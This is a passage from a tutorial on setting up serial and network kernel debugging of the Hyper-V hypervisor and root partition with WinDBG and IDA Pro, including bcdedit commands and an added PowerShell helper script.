normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Run </span><span face="Calibri,sans-serif" 
style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">vmdemux </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(located in the WinDBG x64 directory), passing the host COM port name as a parameter:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">vmdemux.exe -src com:port=com2,baud=115200</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The command demultiplexes the single serial stream into two named pipes: </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Vm0</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> for the hypervisor and </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Vm1</span><span face="Calibri,sans-serif" style="background-color: 
transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> for the root partition.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 103px; overflow: hidden; width: 466px;"><img height="103" src="https://lh6.googleusercontent.com/bLgV4qWpdslLnn9lv5rqgw_QE2jliq0yEGDYerjvAbbdJOhpS08C9CppprhWArTmr_i4leaRbGl4WUBM-YdAv3uNFokAX7kNA535yGYndw3tuQx39_Y1_yZT46UByhFhZ6QXrCFvwvc7S6aezQ" style="margin-left: 0px; margin-top: 0px;" width="466" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: justify; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">6.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">You can attach WinDBG Preview to each pipe to check that the setup works:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; 
color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WinDBGx.exe -k com:port=\\.\pipe\Vm1,pipe,reconnect,resets=0 – root partition</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 165px; overflow: hidden; width: 538px;"><img height="165" src="https://lh3.googleusercontent.com/RHIOLbLR3n6MrC53X8QJmPBVcU5SigbwWzb9FhXDDYziz96avDgPaWgJH_x03qeyph8Qwcs62TxoXR4k6uDCokaiSWB9BJ9F3gAoDjjXDSD9Zt9HJHWQN8-UIgZgsNPbyXLJ8josJgNUOfgFTQ" style="margin-left: 0px; margin-top: 0px;" width="538" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WinDBGx.exe -k com:port=\\.\pipe\Vm0,pipe,reconnect,resets=0 – hypervisor</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 151px; overflow: hidden; width: 571px;"><img height="151" src="https://lh4.googleusercontent.com/c76GSaXsBYM1mbZE50A5jmnlOqV9lQl8WD3nAYfSvF9NQ369_i7fYiNfkv9fKncO5eu82iQpIDw_ei5izr-97T8k9nNy0Jqzl8rwV95XOILgCGGfp6wp0mTFgXmdnR74lPnFxcVpDMYMGLKj5Q" 
style="margin-left: 0px; margin-top: 0px;" width="571" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: justify; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">7.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After that, using IDA Pro, you can connect directly to the hypervisor through the named pipe \\.\pipe\Vm0: choose the WinDBG debugger and enter the connection string in Debugger->Process options: </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">com:port=\\.\pipe\Vm0,pipe,resets=0</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: justify; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">8.</span><span face="Calibri,sans-serif" 
style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If the following message appears, choose </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Same</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 135px; overflow: hidden; width: 338px;"><img height="135" src="https://lh5.googleusercontent.com/d0Ri0TBWhZfo9YU9iX5olnAb_zTqsNpVIJHWCGKZDkfTYZM1BCZD2tD3niqe8cEfDXxiCBJzw_4EN0CM49I7vl1Ks7HyO__AHkJFA9b9ARs99Hp3dhD6GS5Jc1fAkdpG32diZeWuop5i2oDf3w" style="margin-left: 0px; margin-top: 0px;" width="338" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: justify; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: 
baseline;">9.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The debugger breaks in inside the hypervisor:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 177px; overflow: hidden; width: 353px;"><img height="177" src="https://lh5.googleusercontent.com/xOfjM-V1HRIMQQuxtGmxGNlKD0zSHDJ5QkwNQuZI0Vzu1oHdZyYhqp3PUEvMdnfLdJJb6Dx5Z1xIbDTd3lGmDxr7k76JWZqyBthEU4lo93lRNjMQQNdXtYnDvHBJzUnhoNJDG7X43Y2jyHT0eQ" style="margin-left: 0px; margin-top: 0px;" width="353" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: justify; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">10.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; 
font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">As we can see, compared with Windows Server 2012 (R2) there is a new module, kdstub.dll. Early versions of the hypervisor were statically linked with the debug library and were correspondingly large (2-3 MB); the debug transport is now loaded as a separate module, and the current version of hvix64.exe (10.0.17763.1577) is 1 230 KB.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">For network debugging, kdstub.dll is replaced by the appropriate transport module, e.g. 
kd_02_8086.dll:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 109px; overflow: hidden; width: 339px;"><img height="109" src="https://lh3.googleusercontent.com/lwmwbL8QS9z9Zy2M9wj4Osp-iVuwkRd3ODlh1gYr1H2Xxza9wMJxWljssARuIfwDRU20C-KwVzlDjcLEV_mj0ft9Fp_G5C59ne_vk1oIXzbXt6d89cdKEQNCJwZ3WKNALZSIppHYXSsLCIXwTA" style="margin-left: 0px; margin-top: 0px;" width="339" /></span></span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">How to configure COM debugging of Hyper-V running inside a Hyper-V VM is described in the article by Saar Amar (@AmarSaar):</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><a href="https://msrc-blog.microsoft.com/2018/12/10/first-steps-in-hyper-v-research/" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://msrc-blog.microsoft.com/2018/12/10/first-steps-in-hyper-v-research/</span></a></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 
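0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The whole serial setup from section 2.1 (steps 2 to 6), scripted as an added example; this is not code from the original post. Run it with -Role Guest in an elevated prompt inside the VM to apply the bcdedit commands and read them back before rebooting (a mismatched port or baud rate between the hypervisor and root-partition settings otherwise shows up only as a VM that hangs waiting for a debugger), and with -Role Host on the VMware host to wait for the serial pipe, start vmdemux and attach one WinDBG Preview instance to each of the Vm0 and Vm1 pipes. Assumed and not taken from the post: the VM's COM1 is mapped to \\.\pipe\com_1, HHD Free Virtual Serial Ports has already mapped that pipe to COM2 on the host, and vmdemux.exe and windbgx.exe are on PATH. The bcdedit output lines matched by the read-back check (debugport, baudrate, hypervisordebug, debug, dbgtransport) are the ones bcdedit prints for these settings.</span></p>
<pre>
```powershell
<#
  Added example (not from the original post). One script for both ends of the
  serial debugging setup:
    -Role Guest : run elevated inside the Windows Server VM; applies and verifies bcdedit settings
    -Role Host  : run on the VMware host; waits for the pipes, starts vmdemux, attaches WinDBG
  Assumptions: VM COM1 = \\.\pipe\com_1, HHD mapped that pipe to COM2 on the host,
  vmdemux.exe and windbgx.exe are on PATH.
#>
param(
    [Parameter(Mandatory)][ValidateSet('Guest', 'Host')][string] $Role,
    [int]    $DebugPort = 1,        # COMn inside the VM (the post uses DEBUGPORT:1)
    [int]    $BaudRate  = 115200,
    [string] $HostCom   = 'com2',   # host COM port created by HHD Virtual Serial Ports (assumed)
    [switch] $BootDebug             # also enable the boot debugger (used in the next part of the article)
)

function Invoke-Bcdedit([string[]] $Arguments) {
    # bcdedit sets a non-zero exit code on failure; stop immediately rather than
    # leave the boot store half-configured.
    $out = bcdedit.exe @Arguments 2>&1
    if ($LASTEXITCODE -ne 0) { throw "bcdedit $($Arguments -join ' ') failed: $out" }
    return ($out -join "`n")
}

function Set-HvSerialDebug {
    # Hypervisor (hvix64/hvax64) and root partition share one COM port; kdhvcom.dll
    # multiplexes the root-partition stream so vmdemux on the host can split it again.
    Invoke-Bcdedit @('/hypervisorsettings', 'serial', "DEBUGPORT:$DebugPort", "BAUDRATE:$BaudRate") | Out-Null
    Invoke-Bcdedit @('/set', 'hypervisordebug', 'on') | Out-Null
    Invoke-Bcdedit @('/set', 'dbgtransport', 'kdhvcom.dll') | Out-Null
    Invoke-Bcdedit @('/dbgsettings', 'serial', "DEBUGPORT:$DebugPort", "BAUDRATE:$BaudRate") | Out-Null
    Invoke-Bcdedit @('/debug', 'on') | Out-Null
    if ($BootDebug) { Invoke-Bcdedit @('/set', 'bootdebug', 'on') | Out-Null }

    # Read back: both transports must show the same port and baud rate, and the
    # {current} entry must show debugging enabled with the kdhvcom.dll transport.
    $hv  = Invoke-Bcdedit @('/hypervisorsettings')
    $kd  = Invoke-Bcdedit @('/dbgsettings')
    $cur = Invoke-Bcdedit @('/enum', '{current}')
    foreach ($pattern in @("debugport\s+$DebugPort", "baudrate\s+$BaudRate")) {
        if ($hv -notmatch $pattern -or $kd -notmatch $pattern) {
            throw "Readback mismatch for '$pattern'.`n--- hypervisor ---`n$hv`n--- root ---`n$kd"
        }
    }
    foreach ($pattern in @('hypervisordebug\s+Yes', '(?m)^debug\s+Yes', 'dbgtransport\s+kdhvcom\.dll')) {
        if ($cur -notmatch $pattern) { throw "Expected '$pattern' in {current}:`n$cur" }
    }
    Write-Host "Serial debug settings applied and verified. Reboot; the OS will wait for the debugger."
}

function Wait-NamedPipe([string] $Name, [int] $TimeoutSec = 120) {
    # Named pipes can be listed through the \\.\pipe\ pseudo-directory. vmdemux fails
    # if com_1 does not exist yet (VMware creates it only once the VM runs) and WinDBG
    # fails if Vm0/Vm1 are not there yet, so poll instead of guessing at delays.
    $deadline = (Get-Date).AddSeconds($TimeoutSec)
    while ((Get-Date) -lt $deadline) {
        if ([System.IO.Directory]::GetFiles('\\.\pipe\') -contains "\\.\pipe\$Name") { return }
        Start-Sleep -Milliseconds 500
    }
    throw "Pipe \\.\pipe\$Name did not appear within $TimeoutSec s"
}

function Start-HvDebugSession {
    Wait-NamedPipe 'com_1'     # the VM is running and its serial port pipe exists
    $demux = Start-Process -FilePath vmdemux.exe -ArgumentList "-src com:port=$HostCom,baud=$BaudRate" -PassThru
    Start-Sleep -Seconds 1
    if ($demux.HasExited) {
        throw "vmdemux exited with code $($demux.ExitCode); is $HostCom mapped to \\.\pipe\com_1 by HHD?"
    }
    foreach ($pipe in 'Vm0', 'Vm1') { Wait-NamedPipe $pipe }   # created by vmdemux
    foreach ($pipe in 'Vm0', 'Vm1') {
        Start-Process -FilePath windbgx.exe -ArgumentList '-k', "com:port=\\.\pipe\$pipe,pipe,reconnect,resets=0"
    }
    Write-Host "vmdemux PID $($demux.Id): Vm0 = hypervisor, Vm1 = root partition"
}

if ($Role -eq 'Guest') { Set-HvSerialDebug } else { Start-HvDebugSession }
```
</pre>
<p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Keep this configuration on disposable lab VMs only: with debug and hypervisordebug enabled, whoever can open the serial pipe on the host gets unauthenticated read and write access to root-partition and hypervisor memory through the kernel debugger protocol.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 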
0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><h2 dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 18pt; margin-top: 2pt; padding: 0pt 0pt 0pt 18pt; text-align: center; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2.2.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Network debugging</span></h2><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The hypervisor can also be debugged over the network on Windows Server 2012 and later:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; 
font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Enable debugging and specify a port (use different ports for the root partition and the hypervisor):</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bcdedit /debug yes</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bcdedit /dbgsettings net hostip:192.168.2.1 port:50002</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In response, the command displays the connection string for the root partition.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; 
text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bcdedit /set hypervisordebug on</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bcdedit /hypervisorsettings NET HOSTIP:192.168.2.1 PORT:50000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In response, the command displays the connection string for the hypervisor.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Choose </span><span face="Calibri,sans-serif" 
style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Host Only</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> as the network adapter type of the VMware VM, then open </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Edit->Virtual Network Editor </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">in VMware Workstation and check that DHCP is enabled for the </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Host Only</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> subnet. 
Then make sure that the guest OS network interface actually received an address from that subnet by running </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">ipconfig /renew</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> inside the guest.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bcdedit /dbgsettings nodhcp </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">option prevents the debugger transport from using DHCP, so the network mode works with the IP address configured in the operating system. 
In that case DHCP does not need to be configured in VMware.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then run two instances of IDA Pro, choose WinDBG (x64) as the debugger, set the debug type to </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Kernel Mode</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> and set </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Process options->Connection string </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">to the corresponding line returned by the commands above:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; 
font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">net:port=50002,Key=1.2.3.4 – root partition</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">net:port=50000,Key=5.6.7.8 – hypervisor</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">This makes it possible to debug the root partition and the hypervisor simultaneously. 
